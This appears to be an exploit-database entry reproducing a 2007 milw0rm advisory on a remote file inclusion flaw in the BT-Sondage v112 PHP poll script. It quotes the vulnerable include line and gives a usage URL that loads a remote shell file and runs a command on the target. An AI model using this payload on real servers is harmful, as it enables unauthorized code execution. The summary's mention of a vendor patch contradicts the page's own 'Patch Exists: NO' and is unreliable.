BT-Sondage-v112 Remote File Include Vulnerability

vendor:

BT-Sondage

by:

Crackers_Child

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: BT-Sondage

Affected Version From: BT-Sondage v112

Affected Version To: BT-Sondage v112

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

BT-Sondage-v112 Remote File Include Vulnerability

The BT-Sondage-v112 application is affected by a remote file include vulnerability. The vulnerability exists in the gestion_sondage.php file, where an attacker can include a malicious file via the 'repertoire_visiteur' parameter. This can lead to remote code execution and unauthorized access to the server.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the patch provided by the vendor or update to a patched version of the BT-Sondage application. Additionally, input validation and sanitization should be implemented to prevent remote file inclusion attacks.

Source

Exploit-DB raw data:

--------------------------------------------------------------------------------


Title : BT-Sondage-v112 Remote File Include Vulnerability

--------------------------------------------------------------------------------

#Author: Crackers_Child


#cont@ct: localexploit@hotmail.com

--------------------------------------------------------------------------------

Affected software description :
--------------------------------------------------------------------------------

Application :  BT-Sondage
URL :  http://www.phpscripts-fr.net/scripts/download.php?id=1575

--------------------------------------------------------------------------------


dork        : Download Script :)
Exploit     :

--------------------------------------------------------------------------------

Vulnerable Codes .n gestion_sondage.php


include($repertoire_visiteur.'utilitaires/affichage_formulaire.php');

For Patch .t add

if ( !defined( "_GESTION_SONDAGE_PHP" ) )
{

--------------------------------------------------------------------------------


Usage:

http://[target]/[sondage_path]/utilitaires/gestion_sondage.php?repertoire_visiteur=Shell.txt?&cmd=ls


--------------------------------------------------------------------------------

greets: EveryBody :=)

--------------------------------------------------------------------------------

Note : Melek Bir Yandan .eytan Bir Yandan Bas.m Zindan Yardim Et Allah'.m Yardim :(

--------------------------------------------------------------------------------

# milw0rm.com [2007-04-01]